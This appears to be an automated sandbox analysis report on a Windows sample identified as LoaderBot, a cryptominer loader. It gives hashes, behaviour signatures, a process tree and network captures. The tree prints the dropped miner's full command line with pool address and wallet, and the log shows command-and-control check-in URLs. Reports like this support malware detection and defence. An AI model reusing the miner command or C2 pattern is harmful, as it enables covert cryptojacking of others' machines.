Overview

overview

10

Static

static

yhrtfweadqwa.exe

windows7_x64

10

yhrtfweadqwa.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    157s
  • max time network
    164s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    29/04/2022, 15:41 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    yhrtfweadqwa.exe

  • Size

    4.0MB

  • MD5

    9e5ab0afc9796bbed8ca5a2f683aae01

  • SHA1

    7063aaa1901e0ae659c32d33b866684d8282b0d7

  • SHA256

    648e092b2cea4d5640f151203911536056abcb6a16d0de391528e9bd8842b940

  • SHA512

    7e00d93ad0b2c54e2a6a86eec37bf654c580ecd68804fa3275fe3072db8eb9ecdcf06c4e01ac74907a631427a418c3a4160625c659fa5615c9ef47052a3dbf30

Score
10/10
loaderbotloaderminerpersistencesuricata

Malware Config

Signatures

  • LoaderBot

    LoaderBot is a loader written in .NET downloading and executing miners.

    loaderminerloaderbot
  • suricata: ET MALWARE CerberTear Ransomware CnC Checkin

    suricata: ET MALWARE CerberTear Ransomware CnC Checkin

    suricata
  • LoaderBot executable 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\yhrtfweadqwa.exe
    "C:\Users\Admin\AppData\Local\Temp\yhrtfweadqwa.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2652
    • C:\Users\Public\Videos\memory_inject.exe
      "C:\Users\Public\Videos\memory_inject.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Drops startup file
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2848
      • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 45XQiu9A9vmVd5Cy6X35M12NocUr2Hx69X4ZNNu2BsKJYkdksefg2gXJyvBUeEJyDWTfLD6GWmAu4Tab1w4tycfcFMqy8yH -p x -k -v=0 --donate-level=1 -t 1
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1628
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 1628 -s 764
          4⤵
          • Program crash
          PID:2412
      • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 45XQiu9A9vmVd5Cy6X35M12NocUr2Hx69X4ZNNu2BsKJYkdksefg2gXJyvBUeEJyDWTfLD6GWmAu4Tab1w4tycfcFMqy8yH -p x -k -v=0 --donate-level=1 -t 1
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4340
  • C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -pss -s 460 -p 1628 -ip 1628
    1⤵
      PID:1096

    Network

    • flag-us
      GET
      https://www.bing.com/manifest/threshold.appcache
      Remote address:
      13.107.21.200:443
      Request
      GET /manifest/threshold.appcache HTTP/1.1
      Accept: */*
      Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
      Origin: https://www.bing.com
      Accept-Encoding: gzip, deflate, br
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.2.19041; 10.0.0.0.19041.1288) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Host: www.bing.com
      Connection: Keep-Alive
      Cookie: SRCHUID=V=2&GUID=9CC9F79AE5A64831AA8CE66EAAC74944&dmnchg=1; SRCHD=AF=NOFORM; SUID=M; SRCHUSR=DOB=20220414; SRCHHPGUSR=SRCHLANG=en&LUT=1649984064722&IPMH=532f3cd9&IPMID=1649985998964; CortanaAppUID=7CD8473CB7C88EB5F6C2E41FC990803D; MUID=246F28A4DF47460497838A5CBF65C8B6; _SS=CPID=1649987670823&AC=1&CPH=035e8e23; MUIDB=246F28A4DF47460497838A5CBF65C8B6
      Response
      HTTP/1.1 200 OK
      Cache-Control: private
      Content-Length: 933
      Content-Type: text/cache-manifest; charset=utf-8
      Content-Encoding: br
      Vary: Accept-Encoding
      P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
      Set-Cookie: _EDGE_S=SID=2DF3E26EB93F6A6908C3F3FBB8CA6B44; domain=.bing.com; path=/; HttpOnly
      Set-Cookie: MUIDB=246F28A4DF47460497838A5CBF65C8B6; expires=Wed, 24-May-2023 15:41:47 GMT; path=/; HttpOnly
      Set-Cookie: _SS=SID=2DF3E26EB93F6A6908C3F3FBB8CA6B44; domain=.bing.com; path=/; secure; SameSite=None
      Set-Cookie: SRCHHPGUSR=SRCHLANG=en&LUT=1649984064722&IPMH=76ca0aae&IPMID=1649987670823; domain=.bing.com; expires=Wed, 24-May-2023 15:41:47 GMT; path=/; secure; SameSite=None
      X-SNR-Routing: 1
      X-XSS-Protection: 0
      X-Cache: CONFIG_NOCACHE
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      X-MSEdge-Ref: Ref A: DE60EB1B6B324D5A851D95D0E936FC2D Ref B: AMBEDGE0809 Ref C: 2022-04-29T15:41:47Z
      Date: Fri, 29 Apr 2022 15:41:46 GMT
    • flag-us
      GET
      https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
      Remote address:
      13.107.21.200:443
      Request
      GET /AS/API/WindowsCortanaPane/V2/Init HTTP/1.1
      Accept: */*
      Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
      Accept-Encoding: gzip, deflate, br
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.2.19041; 10.0.0.0.19041.1288) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Host: www.bing.com
      Connection: Keep-Alive
      Cookie: SRCHUID=V=2&GUID=9CC9F79AE5A64831AA8CE66EAAC74944&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20220414; SRCHHPGUSR=SRCHLANG=en&LUT=1649984064722&IPMH=76ca0aae&IPMID=1649987670823; CortanaAppUID=7CD8473CB7C88EB5F6C2E41FC990803D; MUID=246F28A4DF47460497838A5CBF65C8B6; _SS=SID=2DF3E26EB93F6A6908C3F3FBB8CA6B44; _EDGE_S=SID=2DF3E26EB93F6A6908C3F3FBB8CA6B44; MUIDB=246F28A4DF47460497838A5CBF65C8B6
      Response
      HTTP/1.1 200 OK
      Cache-Control: private
      Content-Length: 72023
      Content-Type: text/html; charset=utf-8
      Content-Encoding: br
      Vary: Accept-Encoding
      P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
      Set-Cookie: SUID=M; domain=.bing.com; expires=Sat, 30-Apr-2022 15:41:47 GMT; path=/; secure; HttpOnly; SameSite=None
      Set-Cookie: MUIDB=246F28A4DF47460497838A5CBF65C8B6; expires=Wed, 24-May-2023 15:41:47 GMT; path=/; HttpOnly
      X-SNR-Routing: 1
      X-XSS-Protection: 0
      X-UA-Compatible: IE=edge
      X-Cache: CONFIG_NOCACHE
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      X-MSEdge-Ref: Ref A: 5EA777C8DFD64B7D8D2B40AA6011414C Ref B: AMBEDGE0809 Ref C: 2022-04-29T15:41:47Z
      Date: Fri, 29 Apr 2022 15:41:46 GMT
    • flag-us
      DNS
      xxx01xzb.beget.tech
      memory_inject.exe
      Remote address:
      8.8.8.8:53
      Request
      xxx01xzb.beget.tech
      IN A
      Response
      xxx01xzb.beget.tech
      IN A
      91.106.207.25
    • flag-ru
      GET
      http://xxx01xzb.beget.tech/cmd.php?hwid=E27E20AC
      memory_inject.exe
      Remote address:
      91.106.207.25:80
      Request
      GET /cmd.php?hwid=E27E20AC HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
      Host: xxx01xzb.beget.tech
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Server: nginx-reuseport/1.21.1
      Date: Fri, 29 Apr 2022 15:41:50 GMT
      Content-Type: text/html
      Content-Length: 3
      Connection: keep-alive
      Keep-Alive: timeout=30
      X-Powered-By: PHP/5.6.40
    • flag-ru
      GET
      http://xxx01xzb.beget.tech/cmd.php?timeout=1
      memory_inject.exe
      Remote address:
      91.106.207.25:80
      Request
      GET /cmd.php?timeout=1 HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
      Host: xxx01xzb.beget.tech
      Response
      HTTP/1.1 200 OK
      Server: nginx-reuseport/1.21.1
      Date: Fri, 29 Apr 2022 15:41:50 GMT
      Content-Type: text/html
      Content-Length: 4
      Connection: keep-alive
      Keep-Alive: timeout=30
      X-Powered-By: PHP/5.6.40
    • flag-ru
      GET
      http://xxx01xzb.beget.tech/cmd.php?hwid=E27E20AC
      memory_inject.exe
      Remote address:
      91.106.207.25:80
      Request
      GET /cmd.php?hwid=E27E20AC HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
      Host: xxx01xzb.beget.tech
      Response
      HTTP/1.1 200 OK
      Server: nginx-reuseport/1.21.1
      Date: Fri, 29 Apr 2022 15:42:50 GMT
      Content-Type: text/html
      Content-Length: 3
      Connection: keep-alive
      Keep-Alive: timeout=30
      X-Powered-By: PHP/5.6.40
    • flag-ru
      GET
      http://xxx01xzb.beget.tech/cmd.php?timeout=1
      memory_inject.exe
      Remote address:
      91.106.207.25:80
      Request
      GET /cmd.php?timeout=1 HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
      Host: xxx01xzb.beget.tech
      Response
      HTTP/1.1 200 OK
      Server: nginx-reuseport/1.21.1
      Date: Fri, 29 Apr 2022 15:42:50 GMT
      Content-Type: text/html
      Content-Length: 4
      Connection: keep-alive
      Keep-Alive: timeout=30
      X-Powered-By: PHP/5.6.40
    • flag-ru
      GET
      http://xxx01xzb.beget.tech/cmd.php?hwid=E27E20AC
      memory_inject.exe
      Remote address:
      91.106.207.25:80
      Request
      GET /cmd.php?hwid=E27E20AC HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
      Host: xxx01xzb.beget.tech
      Response
      HTTP/1.1 200 OK
      Server: nginx-reuseport/1.21.1
      Date: Fri, 29 Apr 2022 15:43:50 GMT
      Content-Type: text/html
      Content-Length: 3
      Connection: keep-alive
      Keep-Alive: timeout=30
      X-Powered-By: PHP/5.6.40
    • flag-ru
      GET
      http://xxx01xzb.beget.tech/cmd.php?timeout=1
      memory_inject.exe
      Remote address:
      91.106.207.25:80
      Request
      GET /cmd.php?timeout=1 HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
      Host: xxx01xzb.beget.tech
      Response
      HTTP/1.1 200 OK
      Server: nginx-reuseport/1.21.1
      Date: Fri, 29 Apr 2022 15:43:50 GMT
      Content-Type: text/html
      Content-Length: 4
      Connection: keep-alive
      Keep-Alive: timeout=30
      X-Powered-By: PHP/5.6.40
    • flag-us
      DNS
      pool.supportxmr.com
      Driver.exe
      Remote address:
      8.8.8.8:53
      Request
      pool.supportxmr.com
      IN A
      Response
      pool.supportxmr.com
      IN CNAME
      pool-fr.supportxmr.com
      pool-fr.supportxmr.com
      IN A
      37.187.95.110
      pool-fr.supportxmr.com
      IN A
      91.121.140.167
      pool-fr.supportxmr.com
      IN A
      94.23.23.52
      pool-fr.supportxmr.com
      IN A
      94.23.247.226
      pool-fr.supportxmr.com
      IN A
      149.202.83.171
    • 13.107.21.200:443
      www.bing.com
      tls
      791 B
       7.8kB
       11
      11
    • 13.107.21.200:443
      https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
      tls, http
      5.5kB
       86.7kB
       77
      77

      HTTP Request

      GET https://www.bing.com/manifest/threshold.appcache

      HTTP Response

      200

      HTTP Request

      GET https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init

      HTTP Response

      200
    • 91.106.207.25:80
      http://xxx01xzb.beget.tech/cmd.php?timeout=1
      http
      memory_inject.exe
      1.4kB
       1.8kB
       11
      13

      HTTP Request

      GET http://xxx01xzb.beget.tech/cmd.php?hwid=E27E20AC

      HTTP Response

      200

      HTTP Request

      GET http://xxx01xzb.beget.tech/cmd.php?timeout=1

      HTTP Response

      200

      HTTP Request

      GET http://xxx01xzb.beget.tech/cmd.php?hwid=E27E20AC

      HTTP Response

      200

      HTTP Request

      GET http://xxx01xzb.beget.tech/cmd.php?timeout=1

      HTTP Response

      200

      HTTP Request

      GET http://xxx01xzb.beget.tech/cmd.php?hwid=E27E20AC

      HTTP Response

      200

      HTTP Request

      GET http://xxx01xzb.beget.tech/cmd.php?timeout=1

      HTTP Response

      200
    • 94.23.247.226:3333
      pool.supportxmr.com
      Driver.exe
      1.1kB
       845 B
       8
      5
    • 13.89.178.27:443
      322 B
       7
    • 88.221.144.179:80
      322 B
       7
    • 209.197.3.8:80
      322 B
       7
    • 8.8.8.8:53
      xxx01xzb.beget.tech
      dns
      memory_inject.exe
      65 B
       81 B
       1
      1

      DNS Request

      xxx01xzb.beget.tech

      DNS Response

      91.106.207.25

    • 8.8.8.8:53
      pool.supportxmr.com
      dns
      Driver.exe
      65 B
       167 B
       1
      1

      DNS Request

      pool.supportxmr.com

      DNS Response

      37.187.95.110
      91.121.140.167
      94.23.23.52
      94.23.247.226
      149.202.83.171

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      Filesize

      3.9MB

      MD5

      02569a7a91a71133d4a1023bf32aa6f4

      SHA1

      0f16bcb3f3f085d3d3be912195558e9f9680d574

      SHA256

      8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

      SHA512

      534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      Filesize

      3.9MB

      MD5

      02569a7a91a71133d4a1023bf32aa6f4

      SHA1

      0f16bcb3f3f085d3d3be912195558e9f9680d574

      SHA256

      8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

      SHA512

      534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      Filesize

      3.9MB

      MD5

      02569a7a91a71133d4a1023bf32aa6f4

      SHA1

      0f16bcb3f3f085d3d3be912195558e9f9680d574

      SHA256

      8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

      SHA512

      534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

      Download Submit

    • C:\Users\Public\Videos\memory_inject.exe
      Filesize

      4.0MB

      MD5

      5c7bc4cc56f6e6acb801210bc6eda798

      SHA1

      541b6f50091fdc17c2bc8d596c0e202b854fb991

      SHA256

      48f66e13c00038bb2ec12a58bd34cb79f2cf616230c25224c68b81d6c3d7ebf9

      SHA512

      66558bf8679c264c507a1fb8da2fd81347b339d3786487895f902330d63bf9b44be5a136061b0848801b768fea3e525b934d1b04c2cef959cc878b421c6cbd5d

      Download Submit

    • C:\Users\Public\Videos\memory_inject.exe
      Filesize

      4.0MB

      MD5

      5c7bc4cc56f6e6acb801210bc6eda798

      SHA1

      541b6f50091fdc17c2bc8d596c0e202b854fb991

      SHA256

      48f66e13c00038bb2ec12a58bd34cb79f2cf616230c25224c68b81d6c3d7ebf9

      SHA512

      66558bf8679c264c507a1fb8da2fd81347b339d3786487895f902330d63bf9b44be5a136061b0848801b768fea3e525b934d1b04c2cef959cc878b421c6cbd5d

      Download Submit

    • memory/1628-138-0x00000000001D0000-0x00000000001E4000-memory.dmp

      Filesize

      80KB

      Download

    • memory/2848-133-0x0000000000460000-0x0000000000860000-memory.dmp

      Filesize

      4.0MB

      Download

    • memory/2848-134-0x0000000005200000-0x0000000005266000-memory.dmp

      Filesize

      408KB

      Download

    • memory/4340-142-0x00000000004F0000-0x0000000000510000-memory.dmp

      Filesize

      128KB

      Download

    • memory/4340-143-0x0000000001FB0000-0x0000000001FD0000-memory.dmp

      Filesize

      128KB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.